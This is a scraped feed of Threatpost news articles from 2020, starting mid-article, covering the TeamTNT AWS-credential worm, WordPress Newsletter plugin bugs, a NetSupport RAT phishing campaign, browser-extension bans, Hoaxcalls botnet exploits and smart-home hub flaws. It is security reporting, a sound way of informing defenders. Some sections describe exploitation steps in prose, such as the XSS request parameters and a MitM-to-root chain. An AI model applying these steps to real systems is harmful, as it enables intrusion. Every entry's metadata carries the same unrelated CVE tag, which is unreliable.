Once the logins are harvested, the malware logs in and deploys the XMRig mining tool to mine Monero cryptocurrency.\n\nAccording to researchers at Cado Security, the worm also deploys a number of openly available malware and offensive security tools, including \u201cpunk.py,\u201d an SSH post-exploitation tool; a log cleaning tool; the Diamorphine rootkit; and the Tsunami IRC backdoor.\n\nIt is, they said, the first threat observed in the wild that specifically targets AWS for cryptojacking purposes. However, it also carries out more familiar fare.\n\n\u201cThe worm also steals local credentials, and scans the internet for misconfigured Docker platforms,\u201d according to a [Monday posting](<https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/>). \u201cWe have seen the attackers\u2026compromise a number of Docker and Kubernetes systems.\u201d\n\nAs more businesses embrace cloud and container environments, misconfiguration has opened up a new attack surface for cybercriminals. That said, cryptomining threats taking aim at Docker and Kubernetes aren\u2019t new. Attackers continue to scan for [publicly accessible, open Docker/Kubernetes servers](<https://threatpost.com/docker-registries-malware-data-theft/152734/>) in an automated fashion, and then exploit them in order to set up their own containers and execute malware on the victim\u2019s infrastructure.\n\nUsually that malware is a cryptominer of some kind, [as seen in April](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) in a Bitcoin-mining campaign using the Kinsing malware. 
Sometimes the threat is more evolved, as seen in July, when a fresh [Linux backdoor called Doki](<https://threatpost.com/icedid-trojan-rebooted-evasive-tactics/158425/>) was seen infesting Docker servers to set the scene for any number of malware-based attacks, from denial-of-service/sabotage to information exfiltration to ransomware.\n\nHowever, the focus on AWS in this latest set of campaigns \u2013 which [were also flagged](<https://twitter.com/malwrhunterteam/status/1256664761997148161>) by MalwareHunterTeam \u2013 is unique, Cado researchers said.\n\n## **Attacking AWS**\n\nThe attack starts with targeting the way that AWS stores credentials in an unencrypted file at ~/.aws/credentials, and additional configuration details in a file at ~/.aws/config.\n\n\u201cThe code to steal AWS credentials is relatively straightforward \u2013 on execution it uploads the default AWS credentials and config files to the attackers\u2019 server, sayhi.bplace[.]net,\u201d researchers explained. \u201cCurl is used to send the AWS credentials to TeamTNT\u2019s server.\u201d\n\nInterestingly, though the script is written to be a worm, the automated portion of the attack didn\u2019t seem to be in full operation during the security firm\u2019s analysis.\n\n\u201cWe sent credentials created by CanaryTokens.org to TeamTNT, however have not seen them in use yet,\u201d according to the post. \u201cThis indicates that TeamTNT either manually assess and use the credentials, or any automation they may have created isn\u2019t currently functioning.\u201d\n\nThe script that anchors TeamTNT\u2019s worm is repurposed code from the aforementioned Kinsing malware, researchers said, which was originally used to scan for misconfigured Docker APIs, then spin up Docker images and install itself. 
They added that copying code from other tools is common in this area of cybercrime.\n\n\u201cIn turn, it is likely we will see other worms start to copy the ability to steal AWS credentials files too,\u201d they said. \u201cWhilst these attacks aren\u2019t particularly sophisticated, the numerous groups out there deploying cryptojacking worms are successful at infecting large amounts of business systems.\u201d\n\n## **TeamTNT \u2013 It\u2019s Dynamite**\n\nAs far as attribution, TeamTNT announces itself in numerous references within the worm\u2019s code, according to researchers, plus the group uses a domain called teamtnt[.]red. That domain hosts malware, and the homepage is entitled \u201cTeamTNT RedTeamPentesting.\u201d\n\nTeamTNT has been prolific, and was spotted originally earlier in the year. In April, Trend Micro [observed](<https://www.trendmicro.com/vinfo/hk-en/security/news/virtualization-and-cloud/coinminer-ddos-bot-attack-docker-daemon-ports>) the group attacking Docker containers.\n\nAn examination by Cado of one of the mining pools yielding information about the systems that the AWS-capable worm has compromised showed that for the one pool, there were 119 compromised systems, across AWS, Kubernetes clusters and Jenkins build servers.\n\n\u201cSo far we have seen two different Monero wallets associated with these latest attacks, which have earned TeamTNT about three XMR,\u201d researchers explained. \u201cThat equates to only about $300, however this is only one of their many campaigns.\u201d\n\nCado researchers suggested that to thwart such attacks, businesses should identify which systems are storing AWS credential files and delete them if they aren\u2019t needed. 
They should also review network traffic for connections to mining pools or for the AWS credentials file being sent over HTTP, and use firewall rules to limit access to Docker APIs.\n", "cvss3": {}, "published": "2020-08-18T14:14:12", "type": "threatpost", "title": "AWS Cryptojacking Worm Spreads Through the Cloud", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-18T14:14:12", "id": "THREATPOST:0A238D67F7286BA41103801846210F7A", "href": "https://threatpost.com/aws-cryptojacking-worm-cloud/158427/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:46", "description": "Newsletter, a WordPress plugin with more than 300,000 installations, has a pair of vulnerabilities that could lead to code-execution and even site takeover.\n\nThe Newsletter plugin offers site admins a visual editor that can be used to create newsletters and email campaigns from within WordPress. 
According to Wordfence, the issues are a reflected cross-site scripting (XSS) vulnerability and a PHP object-injection vulnerability, both of which can be rectified by updating to the latest version of Newsletter, v.6.8.2.\n\nThe first bug is an authenticated reflected XSS problem (CVE pending), which is a medium-severity issue ranking 6.5 on the CVSS scale. Successful exploitation could allow logged-in attackers to inject malicious code into a web window.\n\n\u201cDespite the fact that [this type of bug] requires an attacker to trick a victim into performing a specific action (such as clicking a specially crafted link), they can still be used to inject backdoors or add malicious administrative users,\u201d according to Wordfence. \u201cIf an attacker tricked a victim into sending a request containing a malicious JavaScript using either of these methods, the malicious JavaScript would be decoded and executed in the victim\u2019s browser.\u201d\n\nAccording to Wordfence, the specific issue arises because vulnerable versions of Newsletter use an AJAX function, tnpc_render_callback, to display edited blocks based on a set of options sent in the AJAX request. However, these options aren\u2019t filtered, but are instead passed directly on to a second function, restore_options_from_request, which displays the blocks using the render_block function, according to [the analysis](<https://www.wordfence.com/blog/2020/08/newsletter-plugin-vulnerabilities-affect-over-300000-sites/>), released Monday.\n\n\u201cAs such, it was possible for an attacker to get malicious JavaScript to display in multiple ways,\u201d researchers explained in the post.\n\nFor instance, one method of exploitation would be to send a POST request to wp-admin/admin-ajax.php with the action parameter set to tnpc_render, the b parameter set to html and the options parameter set to arbitrary JavaScript, according to Wordfence. 
Or, the options parameter could be set to an empty array options[]=, and the encoded_options parameter set to a base64-encoded JSON string containing arbitrary JavaScript. In both cases, JavaScript would be rendered in a logged-in user\u2019s browser.\n\nThe second bug (the CVE is also pending on this one) is a high-severity PHP object-injection bug, carrying a severity ranking of 7.5 on the CVSS scale. The vulnerability could be used to inject a PHP object that in turn could be processed by code from another plugin or theme, and used to execute arbitrary code, upload files or \u201cany number of other tactics that could lead to site takeover,\u201d the firm warned.\n\n\u201cAlthough the Newsletter editor did not allow lower-level users to save changes to a given newsletter, the same tnpc_render_callback AJAX function was still accessible to all logged-in users, including subscribers,\u201d according to Wordfence. \u201cThis introduced a PHP object-injection vulnerability via the restore_options_from_request function.\u201d\n\nIn terms of methods of exploitation, Wordfence researchers explained that the __destruct function is used by many sites to automatically delete files and \u201cclean up\u201d once a pre-defined, legitimate process is completed. 
An example would be a script on an e-commerce site that calculates product prices, stores a log of that action, and then deletes the log when it\u2019s done.\n\nIf this code were running on a site that also contained the PHP object injection vulnerability, an attacker could delete the wp-config.php file containing the WordPress site\u2019s core configuration settings by sending a specially crafted payload.\n\n\u201cThe deletion of the wp-config.php file would reset the site and allow an attacker to take over by pointing the site\u2019s new configuration to a remote database under their control,\u201d explained Wordfence.\n\nThe researchers added that to be successful, an attacker would need to know which plugins are installed on a given site \u2013 which can be uncovered with scanning tools, but which means that the bug would be unlikely to be exploited by an automatic script or in bulk.\n\n## **WordPress Plugin Bugs Proliferate**\n\nWordPress plugins are no strangers to security vulnerabilities, some of which can be critical. For instance, last week [just such a bug was found](<https://threatpost.com/critical-rce-flaw-wordpress-plugin-on-70k-sites/157824/>) in a WordPress plugin called Comments \u2013 wpDiscuz, which is installed on more than 70,000 websites. 
The flaw gives unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.\n\nEarlier in July, [it was discovered that the](<https://threatpost.com/advertising-plugin-wordpress-full-site-takeovers/157283/>) Adning Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.\n\nIn May, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that\u2019s used to build websites via a drag-and-drop function, [was found to harbor](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) two flaws that could allow full site takeover.\n\nMeanwhile in April, it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a [CSRF bug in Real-Time Search and Replace](<https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/>).\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. 
**[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-04T18:11:18", "type": "threatpost", "title": "Newsletter WordPress Plugin Opens Door to Site Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-04T18:11:18", "id": "THREATPOST:158524EA6F79769C547CC6A407EF6E78", "href": "https://threatpost.com/newsletter-wordpress-plugin-site-takeover/158025/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:28:08", "description": "The legitimate remote access tool (RAT) called NetSupport Manager, used for troubleshooting and tech support, is being converted into a malicious weapon by cybercriminals. Researchers at Palo Alto Networks\u2019 Unit 42 division have spotted a spam campaign attempting to deliver a malicious Microsoft Word document that uses the disguise of a NortonLifeLock-protected file.\n\nNortonLifeLock is a security utility for password-protecting attachments, among other things. If a recipient opens the document via Microsoft Office Outlook, a prompt appears that asks users to \u201cenable content\u201d to open the document \u2013 clicking \u201cyes\u201d executes macros.\n\n\u201cTo the user, the document appears to contain personal information that requires a password to view,\u201d said researchers, in a [recent analysis](<https://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/>). \u201cOnce the document is opened and the user clicks \u2018Enable Content,\u2019 the macro is executed and the user is presented with a password dialog box.\u201d\n\nResearchers added that the password is likely provided in the body of the phishing email, because it has to be correct; no malicious activity occurs until the correct key is entered. 
Once the key is accepted, the macros create and execute a batch file called alpaca.bat.\n\n\u201cThe macro obfuscates all strings using multiple labels on Visual Basic for Applications (VBA) forms, which contain two characters that are eventually linked together to construct the final command to download and execute the RAT on the victim,\u201d according to Unit 42. \u201cThe command string is executed via the VBA shell function, which [creates and executes alpaca.bat].\u201d\n\nThe campaign uses a range of tactics to obfuscate its activity from both dynamic and static analysis, according to researchers. For instance, the batch script uses msiexec, which is a legitimate part of the Windows Installer service. It\u2019s used to download and install a Microsoft Intermediate Language (MSIL) binary from a legitimate domain, which has been compromised. Once downloaded, the binary will execute using the /q parameter to suppress any Windows dialogs from the user.\n\nThe campaign also uses the PowerShell-based PowerSploit framework to carry out the installation of the malicious file. The MSI installs a PowerShell script in the victim\u2019s %temp% directory named REgistryMPZMZQYVXO.ps1. This contains another PowerShell script that is responsible for installing the NetSupport Manager RAT onto the victim\u2019s machine.\n\n\u201cThe PowerShell script appears to have been generated using the open-source script Out-EncryptedScript.ps1 from the PowerSploit framework,\u201d according to the analysis. \u201cIt contains a blob of data that is obfuscated via base64 and is TripleDES encrypted with a cipher mode of Cipher Block Chain (CBC).\u201d\n\nThe RAT installer PowerShell script interestingly aborts installation if Avast or AVG Antivirus Software is running on the target machine. 
If not, it installs 12 files that make up the NetSupport Manager RAT to a random directory and sets up persistence by creating the following registry key: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.\n\n\u201cOnce the main NetSupport Manager executable (presentationhost.exe) is started, it beacons to the domain geo.netsupportsoftware[.]com to retrieve geolocation of the host followed by an HTTP POST,\u201d the researchers wrote.\n\nResearchers said that the campaign is likely part of a larger offensive that dates back to early November, with email subject lines reusing themes associated with refunds, as well as transaction and order inquiries. The attached documents contain the target company\u2019s name.\n\n\u201cMalicious use of the NetSupport Manager remote access tool has also been reported by both [FireEye ](<https://www.fireeye.com/blog/threat-research/2018/04/fake-software-update-abuses-netsupport-remote-access-tool.html>)and [Zscaler ](<https://www.zscaler.com/blogs/research/netsupport-rat-installed-fake-update-notices>)researchers,\u201d researchers concluded. 
\u201cWhile this activity appears to be broad and at large scale, there are indications, such as the document name, that show the actor\u2019s attempt to provide a stronger relationship to the target in an attempt to increase the success rate.\u201d\n", "cvss3": {}, "published": "2020-03-02T21:59:34", "type": "threatpost", "title": "NetSupport Manager RAT Spread via Bogus NortonLifeLock Docs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-03-02T21:59:34", "id": "THREATPOST:EBE40A69B865E25E52FF87060EDD790F", "href": "https://threatpost.com/netsupport-manager-rat-nortonlifelock-docs/153387/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:25:35", "description": "UPDATE\n\nBoth the Google Chrome and Mozilla Firefox teams are cracking down on web browser extensions that steal user data and execute remote code, among other bad actions.\n\nBrowser extensions are add-ons that users can install to enhance their web surfing experience \u2013 they offer the ability to do everything from setting a special search wallpaper to displaying continuous weather data to language translation. This group also includes things such as ad blockers and security scanning.\n\nWhile extensions are useful, they can also introduce danger. 
In addition to [intentionally malicious](<https://threatpost.com/malicious-browser-add-guides-victims-phishing-sites-112912/77262/>) browser extensions that compromise users, legitimate offerings are also common targets for cybercriminals who [look to exploit vulnerabilities](<https://threatpost.com/cisco-webex-browser-bug/143285/>) in their code.\n\n## Google Bans Paid Extensions\n\nIn this case, Google said that after becoming aware of a widespread pattern of pernicious behavior on the part of a large number of Chrome extensions, it has disabled extensions that contain a monetary component \u2013 those that are paid for, offer in-browser transactions and those that offer subscription services. It\u2019s a temporary measure, according to the internet giant \u2013 but one that doesn\u2019t yet have a timeline for resolution.\n\n\u201cEarlier this month the Chrome Web Store team detected a significant increase in the number of fraudulent transactions involving paid Chrome extensions that aim to exploit users,\u201d it [said in a notice](<https://groups.google.com/a/chromium.org/forum/#!topic/chromium-extensions/EW0VuDjZSO4>), issued Friday. \u201cDue to the scale of this abuse, we have temporarily disabled publishing paid items. This is a temporary measure meant to stem this influx as we look for long-term solutions to address the broader pattern of abuse.\u201d\n\n[Image: Top 5 Paid Chrome Extensions](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/27133106/google-paid-extensions.png>)\n\nThe notice added, \u201cWe are working to resolve this as quickly as possible, but we do not have a resolution timeline at the moment. Apologies for the inconvenience.\u201d\n\nRejections will carry a \u201cSpam and Placement in the Store\u201d tag, the Google team told developers. Rejections can be appealed and will be reviewed, it noted.\n\nThe impact could be minimal. 
According to [data from Extension Monitor](<https://extensionmonitor.com/blog/breaking-down-the-chrome-web-store-part-1>) published mid-2019, there are about 188,000 extensions in the Chrome Web Store, out of which only about 9 percent (16,718) fall into the paid category. Paid add-ons also account for less than 2.6 percent of the more than 1 billion total extension installs logged in the research. The top five paid extensions make up about half (48.5 percent) of that number, with IE Tab dominating at 4.1 million installs (31.5 percent). About 35 percent of paid extensions (5,885) don\u2019t have any users at all.\n\n_**Updated 9:30 a.m. ET on Jan. 28: Threatpost has reached out to Google for clarification on whether existing paid extensions have been taken down, or if the policy applies only to updates and new submissions.**_\n\n## Mozilla Cleans House\n\nMozilla meanwhile has taken a more case-by-case tack, disabling 197 Firefox add-ons in total for a range of improper activity, as first [reported by ZDNet](<https://www.zdnet.com/article/mozilla-has-banned-nearly-200-malicious-firefox-add-ons-over-the-last-two-weeks/>). This includes remote code-execution and harvesting user data. The add-ons have not only been removed from the official Mozilla Add-on (AMO) portal, but have been disabled in the browsers of existing installs.\n\nThe disabled apps include a whopping 129 extensions from 2Ring, which offers extensions and add-ons that provide business-to-business functionality for unified communications and contact centers. It\u2019s a Cisco Preferred Partner, and it [says on its website](<https://www.2ring.com/products/>) that it has \u201ca roadmap aligned with Cisco\u2019s collaboration portfolio and with solutions that their system engineers can deploy repeatedly and support with ease.\u201d\n\nThreatpost reached out to 2Ring for comment. 
Meanwhile, \u201cI\u2019ve reviewed the add-ons and confirmed they are executing remote code,\u201d according to the bug tracker on the issue.\n\nThat\u2019s not to say the extensions were intentionally malicious. Mozilla\u2019s policy is that extensions that dynamically fetch code from elsewhere, legitimate or otherwise, are in violation of its [content security policy](<https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Content_Security_Policy>).\n\nThe blocked extensions uncovered by ZDNet also include [six add-ons](<https://bugzilla.mozilla.org/show_bug.cgi?id=1609718>) deemed to be executing remote code, which were developed by Tamo Junto Caixa. [Tamo Junto](<https://aliancaempreendedora.org.br/tamojunto/faq/>) is a banking entity that offers Brazilian microentrepreneurs online courses, video classes, articles and management tools.\n\nOther browser extensions, like Rolimons Plus (an extension linked to the Roblox online multiplayer video game), [were blocked](<https://bugzilla.mozilla.org/show_bug.cgi?id=1608432>) for \u201ccollecting ancillary user data against our policies,\u201d while others (unnamed in the bug ticket) [were banned](<https://bugzilla.mozilla.org/show_bug.cgi?id=1610462>) for \u201cshowing malicious behavior on third-party websites.\u201d Still others, including [three unnamed add-ons](<https://bugzilla.mozilla.org/show_bug.cgi?id=1610456>), were determined to be \u201cfake premium products.\u201d\n\nAs with Google Chrome, Mozilla developers are able to appeal the bans.\n\nAt least one researcher said that the actions are likely the fruit of heightened concerns and regulations around privacy, including the California Consumer Privacy Act (CCPA).\n\n\u201cIn the [post-CCPA/GDPR world](<https://threatpost.com/californias-tough-new-privacy-law-and-its-biggest-challenges/151682/>), tech companies are paying greater attention to the risks that software poses to users,\u201d said Mike Bittner, associate director of Digital 
Security and Operations for The Media Trust, via email. \u201cMuch of the risks stem from having no control over what impact code will have on the security and privacy of user personal data. Until tech companies know who\u2019s running what code in the various components that make up extensions and other forms of software, the risk of fraud and theft will remain high, as will the risk of running afoul of these new privacy laws.\u201d\n", "cvss3": {}, "published": "2020-01-27T21:26:55", "type": "threatpost", "title": "Google, Mozilla Ban Hundreds of Browser Extensions in Chrome, Firefox", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-01-27T21:26:55", "id": "THREATPOST:6F4D076CD2B99D42353A5547FDBB288C", "href": "https://threatpost.com/google-mozilla-ban-browser-extensions-chrome-firefox/152257/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:25:06", "description": "Cyberattackers are targeting a post-authentication remote code-execution vulnerability in Symantec Secure Web Gateways as part of new Mirai and Hoaxcalls botnet attacks.\n\nHoaxcalls first emerged in late March, as a variant of the Gafgyt/Bashlite family; it\u2019s named after the domain used to host its malware, Hoaxcalls.pw. Two new Hoaxcalls samples [showed up on the scene](<https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/>) in April, incorporating new commands from its command-and-control (C2) server. These included the ability to proxy traffic, download updates, maintain persistence across device restarts, prevent reboots and launch a larger number of distributed denial-of-service (DDoS) attacks.\n\nIt also incorporated a new exploit for infiltrating devices \u2013 an [unpatched vulnerability](<https://threatpost.com/flaws-zyxels-network-management-software/153554/>) impacting the ZyXEL Cloud CNM SecuManager that was disclosed in March. 
Now, researchers at Palo Alto Networks\u2019 Unit 42 division have observed that same version of the botnet exploiting a second unpatched bug, this time in Symantec Secure Web Gateway version 5.0.2.8, which is a product that became end-of-life (EOL) in 2015 and end-of-support-life (EOSL) in 2019.\n\nThe Symantec bug was [disclosed in March](<https://code610.blogspot.com/2020/03/postauth-rce-in-symantec-web-gateway.html>). Since it affects older versions of the gateway, it will remain unpatched.\n\n\u201cOn April 24, I observed samples of the same botnet incorporating an exploit targeting the EOL\u2019d Symantec Secure Web Gateway v5.0.2.8, with an HTTP request in the format: POST /spywall/timeConfig.php HTTP/1.1,\u201d said Unit 42 researcher Ruchna Nigam, in a [Thursday post](<https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/>). \u201cSome samples reach out to a URL for a public file upload service (plexle[.]us) where the post-exploitation payload is hosted. The URL contacted for the update serves a shell script that downloads and executes binaries from attacker-controlled URLs.\u201d\n\nMeanwhile, Nigam also saw a [Mirai variant](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>) campaign in May spreading using that same vulnerability; oddly, the malware itself lacks any DDoS capabilities, according to the researcher. As such, the binary seems to be a first-stage loader.\n\n\u201cSamples of this campaign surfaced early May, built on the Mirai source code, and are packed with a modified version of UPX by using a different 4-byte key with the UPX algorithm,\u201d according to Nigam. 
\u201cAnother deviation from the Mirai source-code is the use of all of ten 8-byte keys that are cumulatively used for a byte-wise string encryption scheme.\u201d\n\nThe vulnerability as mentioned is a post-authentication bug, meaning that the exploit is only effective for authenticated sessions. It\u2019s also no longer present in the latest version of the Symantec Web Gateway, version 5.2.8, so updated devices are protected.\n\nResearchers at Radware previously noted that Hoaxcalls operators seem very quick to weaponize newly discovered bugs, like the ZyXel vulnerability. Unit 42\u2019s Nigam came to a similar conclusion:\n\n\u201cThe use of the exploit in the wild surfaced only a few days after the publication of the vulnerability details, highlighting the fact that the authors of this particular botnet have been pretty active in testing the effectiveness of new exploits as and when they are made public,\u201d according to the researcher.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On [June 3 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>), join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, [Taming the Unmanaged and IoT Device Tsunami](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>). Get exclusive insights on how to manage this new and growing attack surface. 
[Please register here](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>) for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-15T20:41:24", "type": "threatpost", "title": "Hoaxcalls Botnet Exploits Symantec Secure Web Gateways", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-05-15T20:41:24", "id": "THREATPOST:6A1329627DFBA3501BA187A580E968D5", "href": "https://threatpost.com/hoaxcalls-botnet-symantec-secure-web-gateways/155806/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:19", "description": "Three different connected home hubs \u2013 Fibaro Home Center Lite, Homematic Central Control Unit (CCU2) and Elko\u2019s eLAN-RF-003 \u2013 are vulnerable in their older versions to serious bugs that would allow information disclosure, man-in-the-middle (MiTM) attacks and unauthenticated remote code execution (RCE), according to researchers.\n\nHome hubs are used to connect a range of smart devices (including appliances, IP cameras, smart thermostat and doorbell gadgets, connected TVs, Google Home and Amazon Alexa offerings, plus laptops, phones and the like). Researchers at ESET pointed out in [Tuesday research](<https://www.welivesecurity.com/2020/04/22/serious-flaws-smart-home-hubs-is-your-device-among-them/>) that an attacker that compromises one of these could in theory gain full access to all of the peripheral devices connected to it \u2013 a scenario that could also impact businesses given that more people are working from home.\n\n[](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)\n\nThe flaws were disclosed by ESET just this week, though most of them were fixed in previous updates. 
They still impact a number of IoT devices, the analyst firm said \u2013 likely because consumers don\u2019t tend to update their device firmware very often, if at all; and, a handful of the flaws remain unaddressed.\n\n**Fibaro Home Center Lite**\n\nFibaro Home Center Lite (firmware version 4.170) was found by the ESET IoT research team to be vulnerable to a range of bugs. The problems included TLS connections that were vulnerable to MitM attacks thanks to a missing certificate validation \u2013 which would open the door to command injection; the use of a very short, hardcoded password stored in the file /etc/shadow in the device\u2019s firmware, ripe for brute-forcing; the use of a hardcoded password salt; and a vulnerable weather service API that leaked the exact GPS coordinates of the device due to the use of unencrypted HTTP communications.\n\nSome of these could be chained together to create an SSH backdoor for full control of a targeted device.\n\nFor instance, ESET researchers were able to create their own MiTM server, thanks to the fact that the Fibaro Home Center Lite communicates with its cloud server via a standard SSH tunnel, but it fails to validate the certificate for TLS communications with the server.\n\n\u201cFibaro Home Center Lite sends two separate TLS-encrypted requests asking for the SSH server\u2019s hostname and listening port,\u201d the researchers explained. 
\u201cBased on the information returned, Fibaro Home Center Lite creates a secured connection via an SSH tunnel to the specified SSH server.\u201d\n\nBecause of the failure to perform certificate verification on the TLS requests, any attacker can use fake certificates signed by their proxy server to accept the public key of the targeted device and mimic the original Fibaro server.\n\n\u201cTo make matters worse, intercepted TLS requests \u2013 intended to create the SSH tunnel between the device and the legitimate server \u2013 are vulnerable to command injection,\u201d according to the research. \u201cBy using the MitM server, attackers can replace the address of the original server lb-1.eu.ra.fibaro.com with whatever they wish.\u201d\n\nFor example, the attacker can generate a malicious response with a command injection that causes the device\u2019s initialization shell script to fail. That prompts the device to request the server\u2019s IP address once again \u2013 a request that can now be intercepted by the attacker and replaced with a different tunnel.\n\n\u201cAnother tunnel is created, through which the attacker\u2019s SSH backdoor port is forwarded,\u201d according to the analysis. \u201cThis reroutes the communication from both ports (SSH 666, HTTP 80) to the attacker\u2019s MitM server. From this point on, the attacker has root access to Fibaro Home Center Lite.\u201d\n\nFrom there, attackers can intercept firmware updates and uncover the hardcoded root password, valid for all Fibaro Home Center Lite devices, which can be \u201ctrivially brute-forced,\u201d according to the security firm.\n\nAttackers can also manipulate user credentials for the device\u2019s web interface, stored in an SQLite database on Fibaro Home Center Lite.\n\n\u201cThese passwords are stored SHA-1 hashed, created from the supplied password salted with a hardcoded string that can easily be extracted from a script in the firmware image file,\u201d the analysis detailed. 
\u201cUsing the salt, an attacker can rewrite existing credentials in the appropriate row of the Home Center Lite\u2019s SQLite database located at /mnt/user_data/db, rendering the legitimate password invalid.\u201d\n\nFibaro issued patches for the issues, so that the home hubs now verify server certificates and disallow command injections; and the hardcoded root password has been replaced with a \u201clonger and more secure alternative,\u201d according to ESET.\n\nThe hardcoded salt string used to create the SHA-1 hash of the password is however a lingering issue.\n\n**Homematic Central Control Unit (CCU2)**\n\nThe Homematic CCU2 (firmware version 2.31.25) harbors a bug that would allow unauthenticated remote code execution (RCE) as a root user.\n\nThe issue arises from a common gateway interface (CGI) script that handles the logout procedure of the Homematic CCU2\u2019s web-based administration interface.\n\n\u201cThe $sid (session ID) parameter was not properly escaped, enabling an attacker to inject malicious code and run arbitrary shell commands as the root (administrator) user,\u201d according to the research. 
\u201cAs the logout script did not check that it is processing a request from a currently logged-in session, an unlimited number of these requests could be made by an attacker without ever having to log into the device.\u201d\n\nUsing this, an attacker could set a new root password.\n\nThe issue has been patched.\n\n**Elko\u2019s eLAN-RF-003**\n\nThe eLAN-RF-003 (firmware version 2.9.079) is a smart RF box that allows users to control a variety of systems such as lighting, hot-water temperature, heating, smart locks, shutters, blinds, fans, power outlets and more via an application installed on a smartphone.\n\nESET uncovered critical vulnerabilities in the hub, including the use of the unencrypted HTTP protocol for the box\u2019s web GUI communication; essentially, all user communications \u2013 including sensitive data such as usernames and passwords \u2013 were sent over the network without encryption or any other form of protection, allowing any attacker to intercept the information in the clear.\n\nAlso at issue: Inadequate authentication, allowing all commands to be executed without requesting a login; a lack of session cookies, thus lacking any mechanism that could verify that the user was correctly logged in; and, peripheral devices connected to the smart RF box were vulnerable to record and replay attacks.\n\n\u201cUnauthenticated access to the web interface is a severe issue, as it gives anyone with access to the local network the ability to take control over the smart RF box and subsequently all the devices connected to it,\u201d according to the analysis. 
\u201cThis is especially worrying due to possible combination with other vulnerabilities that allow the attacker to gain a foothold in the local Wi-Fi network.\u201d\n\nAttackers would be able to extract information about peripheral devices, floor plans, errors, attributes of the managed smart home, the device\u2019s firmware version, and so on, ESET noted.\n\nUnfortunately, two of the reported vulnerabilities (the unencrypted web interface communication and insecure radio frequency (RF) communication) appear to have remained unpatched, while only partial patches were issued for the others, ESET said. That said, the researchers haven\u2019t probed the latest generation of the device.\n\nThreatpost has reached out to the vendors for further comment.\n\n\u201cMost of the flaws disclosed by ESET have been fixed by the vendors of these particular devices,\u201d the researchers concluded. \u201cHowever, some of the issues appear to have been left unresolved, at least on older generations of devices. Even if newer, more secure generations are available, though, the older ones are still in operation\u2026.[security vulnerabilities in IoT devices](<https://threatpost.com/half-iot-devices-vulnerable-severe-attacks/153609/>) are a prevalent issue.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. 
